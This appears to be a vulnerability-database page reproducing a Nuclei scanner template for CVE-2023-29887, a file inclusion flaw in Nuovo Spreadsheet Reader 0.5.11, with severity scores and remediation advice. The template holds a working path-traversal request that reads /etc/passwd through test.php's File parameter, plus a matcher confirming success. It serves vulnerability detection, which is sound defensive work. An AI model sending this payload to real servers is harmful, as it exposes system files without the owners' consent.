Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-29887
HistoryMay 24, 2023 - 6:08 p.m.

Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion

2023-05-2418:08:59
ProjectDiscovery
github.com
3
cve2023
nuovo
spreadsheet-reader
lfi
vulnerability
remote attackers
arbitrary files
upgrade
vendor fix

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.006 Low

EPSS

Percentile

77.6%

A Local File inclusion vulnerability in test.php in spreadsheet-reader 0.5.11 allows remote attackers to include arbitrary files via the File parameter.
id: CVE-2023-29887

info:
  name: Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion
  author: ctflearner
  severity: high
  description: |
    A Local File inclusion vulnerability in test.php in spreadsheet-reader 0.5.11 allows remote attackers to include arbitrary files via the File parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and further compromise of the server.
  remediation: |
    Upgrade to a patched version of Nuovo Spreadsheet Reader or apply the vendor-provided fix to mitigate the Local File Inclusion vulnerability.
  reference:
    - https://research.hisolutions.com/2023/01/arbitrary-file-read-vulnerability-php-library-nuovo-spreadsheet-reader-0-5-11/
    - https://github.com/nuovo/spreadsheet-reader/issues/169
    - https://nvd.nist.gov/vuln/detail/CVE-2023-29887
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-29887
    cwe-id: CWE-22
    epss-score: 0.00553
    epss-percentile: 0.7749
    cpe: cpe:2.3:a:nuovo:spreadsheet-reader:0.5.11:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: nuovo
    product: spreadsheet-reader
  tags: cve2023,cve,nuovo,spreadsheet-reader,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022005705319fbc90464db11a2808fdf787408f2afac55b623fd0b9f8762003f871b022100a345f4f918983f4b23c2b0d88e62b9122872ebcaa97b2632ade1ce647c182003:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.006 Low

EPSS

Percentile

77.6%

Related for NUCLEI:CVE-2023-29887